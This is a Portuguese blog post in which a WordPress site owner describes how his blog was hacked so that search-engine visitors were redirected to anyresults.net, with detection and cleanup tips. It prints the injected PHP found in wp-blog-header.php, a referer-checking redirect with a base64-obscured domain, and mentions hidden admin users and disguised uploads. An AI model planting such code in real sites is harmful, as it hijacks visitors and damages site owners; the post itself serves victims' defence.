Suas Visitas do Google Sumiram? Seu Wordpress Pode Ter Sido Hackeado

Há alguns dias passei por uma situação estranha. Todas as visitas do Blosque, vindas do Google, desapareceram. No entanto, o blog continuava indexado. Nas mesmas posições que antes!

Vários dias de pesquisa foram necessários, para que eu finalmente descobrisse o que estava acontecendo. Fui vítima de um…

Exploit que está atacando muitos blogs do Wordpress.

O que o exploit faz é redirecionar as visitas vindas do Google (e de outras fontes) para o site anyresults.net ou your-needs.info.

Isso é o que causa esse estranho efeito que eu notei: o blog continua indexado, nas mesmas posições, mas não recebe visitas do Google.

Como bem disse o Becher, a impressão que dá é que as pessoas tivessem deixado de usar o Google.

O exploit tem várias formas.

O famoso Donncha descreve várias delas no post Did Your WordPress Site Get Hacked?, junto com as soluções para cada caso.

No meu blog, o exploit foi feito através do arquivo wp-blog-header.php. Este código foi inserido no começo do arquivo:

<?php $seref=array("google","msn","live","altavista",
"ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){
$ser=”1″; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location:
http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

Essa é só uma possibilidade.

Os códigos de redirecionamento também podem aparecer em seus arquivos do theme, em arquivos php ou disfarçados como plugins - em alguns casos, é feito o upload de um código php, disfarçado como jpg, à sua pasta de uploads. O código então é inserido na lista de plugins ativos, e aí, babaus visitas.

Para uma lista extensiva (e soluções) dos hacks, visite o post Did Your WordPress Site Get Hacked?. Também há mais informação nos fóruns do Wordpress.

Falha de Segurança no Wordpress 2.5.1?

O pessoal do Wordpress insiste em que o Wordpress 2.5.1 não é afetado pelo exploit - eles dizem que se você usa 2.5.1 e foi afetado, já deveria estar com a intrusão no blog, antes de fazer o upgrade.

Eu tenho lá minhas dúvidas.

Muita gente diz que foi hackeado após o upgrade, e isso é bastante fácil de perceber: no dia em que seu blog é hackeado, suas visitas desaparecem. Duvido muito que o exploit seja uma bomba de tempo, ou que lhe dê um período de “graça” antes de entrar em ação.

Duas últimas coisas, que descobri pesquisando sobre o assunto:

1 - O hack pode criar um user fantasma no seu blog, o que vai lhe permitir voltar a roubar suas visitas, caso você limpe a merda que foi feita.

Eu encontrei um user “Wordpress” na tabela wp-users, que não foi criado por mim e não era visível no painel de controle do Wordpress. Se você foi hackeado, ou desconfia ter sido, não esqueça de dar uma boa olhada nessa tabela, procurando por algum usuário estranho.

2 - Havia um arquivo chamado wp-info.txt na raiz do blog, onde estavam listadas todos os users e passwords do Wordpress e das bases de dados. É claro que esse arquivo deve ser deletado, como parte da limpeza do hack.

Mais informação:

• My Digital Life - WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Illegal Sites
• Digital Point Forums - Same Google Serps, Huge Drop in Traffic
• Digital Point Forums - Hack 302-ing site to anyresults.net
• Digital Point Forums - Wordpress Hack - Hacker redirect SE traffic to his site
• Magpie Brain - WordPress Site Hacked
• Shoemoney - WordPress Redirect h4x’s
• Tiffany Washko - Help for the anyresults.net Hack
• Jammer Six - WordPress Hacked, Search Engine Traffic Stolen by AnyResults.net
• WordPress AnyResults.net Hack - Search Engine Visits Redirecting to AnyResults.net